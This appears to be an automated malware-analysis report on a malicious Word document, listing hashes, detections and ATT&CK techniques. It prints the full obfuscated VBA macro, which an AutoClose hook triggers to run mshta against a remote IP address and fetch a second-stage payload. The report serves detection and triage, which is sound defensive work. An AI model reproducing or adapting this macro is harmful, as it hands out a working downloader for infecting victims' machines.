Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e08f1f54620bafe4…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 54.9 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-05-10

MD5: d38bf4f8675fc8e27d533e6c489bac03
SHA-1: ede200073e2e9db262b255a1fbe7bf61c5436075
SHA-256: e08f1f54620bafe44200b3e12177e6a934e2d27910125144aec9606b68d44a88

Risk Score: 322

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is an OOXML document containing a VBA macro identified with high confidence. The macro is obfuscated: it builds its strings from junk-token placeholders that are stripped with a chain of Replace calls, then uses CreateObject to instantiate WScript.Shell, indicating it is designed to execute commands. The reconstructed URL 'http://104.144.207.225/LEX/DKKGDdKfLqTEnirwxOMEYoWDnich.php?urwxOMEYoWDniWurEjucyKAOKMUjFTjTRyoWn=proj' suggests the macro's purpose is to download and execute a second-stage payload. Note that this string is only partially decoded: applying the full Replace chain visible in the extracted macros.bas below (for example "DKKGDdKfLqTE" to "s" and "rwxOMEYoWDni" to "t") resolves the path to /LEX/snitch.php?utma=proj, and the leading token of the same string to mshta, so the value passed to WScript.Shell.Run is an mshta invocation of that URL. The only network indicator on this page is the IP address 104.144.207.225.

Heuristics (7)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML [medium, 4 related findings] (OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    An auto-exec VBA routine reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source as literals, so plain string scanning of the source does not surface them.
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    An Auto_Close macro is present; it runs when the document is closed, so the payload fires even if the user only opens and dismisses the file.
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    A CreateObject call is present (here with a decoded ProgID argument, so the target object name is not visible in the source).
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL in this list is an OOXML/DrawingML XML namespace URI found in the document body, which any Word-authored .docx carries; the command-and-control URL discussed above came from the macro channel and is not part of this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 2876 bytes
  SHA-256: f9c4bf056d94491599cf7131b42a8a14f6336cd3e4f16f3400204396aae59af4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub uretra()
 xyOxPRk = 391 - 66 - 1198 - 715 - 236 - 1564
UVpLKTKz = 1442 - 1700 - 1945
wRYuqMqIEv = 1251 + 1792 + 1472 + 315 + 782
IFASDGE = "T" & "L" & "K"
KEVTHrbHZ = Trim("d") & "Y" & "A" & "U"

 ruivo = "WurEjucyKAOKDKKGDdKfLqTEhrwxOMEYoWDniMUjFTjTRyoWn hrwxOMEYoWDnirwxOMEYoWDnip://104.144.207.225/LEX/DKKGDdKfLqTEnirwxOMEYoWDnich.php?urwxOMEYoWDniWurEjucyKAOKMUjFTjTRyoWn=proj"
ruivo = Replace(ruivo, "WurEjucyKAOK", "m")
QKrBACJkSL = 1376 - 790 - 1743 - 1694 - 43 - 1626 - 215 - 22
rxrqNBoYvx = 1561 - 1559 - 1528 - 24
FPQcBLo = 801 + 720 + 1185 + 470 + 1285
ruivo = Replace(ruivo, "MUjFTjTRyoWn", "a")
PAGxfKLk = 581 + 1847 + 1817 + 1011
WpkyLwySwU = Trim("A") & "j" & Trim("S")
ruivo = Replace(ruivo, "DKKGDdKfLqTE", "s")
gXYRNfRO = 1935 + 1093 + 180 + 1282 + 1422 + 61
WyjyfTdbkdg = Trim("z") & "R" & Trim("j")
SPUZYYnIX = 1764 - 1712 - 952 - 1352
ruivo = Replace(ruivo, "rwxOMEYoWDni", "t")
fXVUgIiE = 7 - 443 - 953 - 653 - 848
DQvIKnoBdQ = 257 - 1931 - 1159
WAToDfUPF = 1558 + 926 + 258 + 1296 + 969
ruivo = Replace(ruivo, "WNWcqZzHDinZ", "e")
ruivo = Replace(ruivo, "JJPoKxDLrOGT", "l")
joQAqIWId = 1074 - 256 - 1805 - 1305 - 1281
vOJHwOpr = "g" & Trim("S") & Trim("K")

licoroso = "WScripOVAYPVVIkSVX.ShxqFnHdHKZpurnTUOFjynIGjxnTUOFjynIGjx"
licoroso = Replace(licoroso, "czCwAkPqrXqq", "m")
qGgpqpXZNx = "M" & Trim("X") & "w"
yPbjBzY = "j" & "r" & "c" & Trim("Z") & "L"
BjwTPCCuQyzp = 1409 - 451 - 1836 - 713 - 1666 - 220 - 336
licoroso = Replace(licoroso, "JwzKpFVBLVdr", "a")
licoroso = Replace(licoroso, "zqSixukYXfPb", "s")
licoroso = Replace(licoroso, "OVAYPVVIkSVX", "t")
rOkjFqpvfoJ = 938 + 1964 + 407 + 1135 + 1201
zTjFCAfvggUF = 1383 + 595 + 124 + 272 + 1032 + 1585
WfkEAEP = 801 - 847 - 1039
licoroso = Replace(licoroso, "xqFnHdHKZpur", "e")
licoroso = Replace(licoroso, "nTUOFjynIGjx", "l")


 CreateObject(licoroso).Run ruivo, 0
 ZIRBXFDFWqY = "A" & "U"
gIACNWwRFZn = Trim("E") & "M" & "G" & Trim("J")
fTjxYzRV = 1169 - 1465 - 1209
pNQxSjCERJ = "x" & Trim("N") & Trim("c") & "x" & "r"
QODoqTARL = "N" & Trim("K") & "W" & Trim("M") & "x"

End Sub

Sub AutoClose()

  NRZbnrnCD = Trim("H") & Trim("x") & Trim("B") & Trim("G")
KoSPuucMbz = Trim("M") & Trim("X") & Trim("b")
UdVnXELqFY = 224 + 1508
vNWcCHTI = 829 - 1432 - 373
GupbvdHBbfEy = "r" & Trim("X") & "B"
QrfJwvDbJnS = 892 + 1645 + 1377 + 1456
gSpiCFcof = 166 - 657 - 909 - 1539 - 1351

  Application.Run "uretra"
  yyDxiVOO = "C" & Trim("v") & "g" & "F" & "M"
bJuHCbYxMQ = 1321 + 223 + 842
NCJkpyik = 1475 - 535 - 67 - 626

End Sub
Artifact 2
  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 14336 bytes
  SHA-256: e5d3e1152f4e5f483800ecfc2df4f5e5fc9176588d6e64eaf454a126e4264e25
  Detection: ClamAV: Doc.Malware.Emooodldr-6711604-0
  Obfuscation or payload: unlikely